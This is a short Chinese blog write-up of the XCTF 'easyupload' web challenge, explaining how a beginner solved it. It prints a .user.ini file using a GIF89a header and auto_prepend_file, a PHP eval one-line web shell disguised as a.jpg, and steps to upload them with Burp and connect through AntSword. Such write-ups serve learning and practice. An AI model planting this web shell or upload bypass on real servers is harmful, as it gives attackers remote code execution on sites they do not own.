攻防世界web-----easyupload

简介: 攻防世界web-----easyupload

这道题对小白的我来说还是很难的,做出这道题我也是看了很多的解答后自己重新试了一遍(我是在window下进行的,在kali稍微有点不一样,就是那个.user.ini得改为user.ini之后再在抓包那里修改为.user.ini就好了(就是第二步))之所以有点不一样是因为kali中"."开头会隐藏。


1.首先我们需要上传两个文件,一个是.user.ini另一个是a.jpg(a可以随意命名)

.user.ini的内容为

GIF89a                  
auto_prepend_file=a.jpg

a.jpg的内容为

1. GIF89a
2. <?=eval($_POST['cmd']);?>

2.接下来先上传.user.ini文件之后用burp抓包

3.然后再上传a.jpg文件

4.上传完之后按fn+f12(笔记本电脑)看网络的url(每个人的可能不太一样)

5.接下来就使用蚁剑连接url就是第四步的网址,密码是cmd

6.连接成功后双击打开网址会出现下面的目录

7.打开flag文件就可以得到flag啦

目录
打赏
0
0
0
0
1
分享
相关文章
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
|
9月前
攻防世界12-baby_web
攻防世界12-baby_web
攻防世界---baby_web
攻防世界---baby_web
|
9月前
|
攻防世界web---fileinclude
攻防世界web---fileinclude
攻防世界 Web_php_unserialize
攻防世界 Web_php_unserialize
105 0
Java Web应用的安全防护与攻防深度剖析
Java Web应用的安全防护与攻防深度剖析
攻防世界---web---warmup
攻防世界---web---warmup
攻防世界---web---warmup
攻防世界---web---NewsCenter
攻防世界---web---NewsCenter

热门文章

最新文章

  • 1
    Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
    22
  • 2
    AppSpider Pro 7.5.015 for Windows - Web 应用程序安全测试
    19
  • 3
    【02】客户端服务端C语言-go语言-web端PHP语言整合内容发布-优雅草网络设备监控系统-2月12日优雅草简化Centos stream8安装zabbix7教程-本搭建教程非docker搭建教程-优雅草solution
    53
  • 4
    部署使用 CHAT-NEXT-WEB 基于 Deepseek
    279
  • 5
    【2025优雅草开源计划进行中01】-针对web前端开发初学者使用-优雅草科技官网-纯静态页面html+css+JavaScript可直接下载使用-开源-首页为优雅草吴银满工程师原创-优雅草卓伊凡发布
    26
  • 6
    java spring 项目若依框架启动失败,启动不了服务提示端口8080占用escription: Web server failed to start. Port 8080 was already in use. Action: Identify and stop the process that’s listening on port 8080 or configure this application to listen on another port-优雅草卓伊凡解决方案
    37
  • 7
    零基础构建开源项目OpenIM桌面应用和pc web- Electron篇
    27
  • 8
    【01】客户端服务端C语言-go语言-web端PHP语言整合内容发布-优雅草网络设备监控系统-硬件设备实时监控系统运营版发布-本产品基于企业级开源项目Zabbix深度二开-分步骤实现预计10篇合集-自营版
    20
  • 9
    FastAPI与Selenium:打造高效的Web数据抓取服务 —— 采集Pixabay中的图片及相关信息
    53
  • 10
    springSecurity学习之springSecurity过滤web请求
    59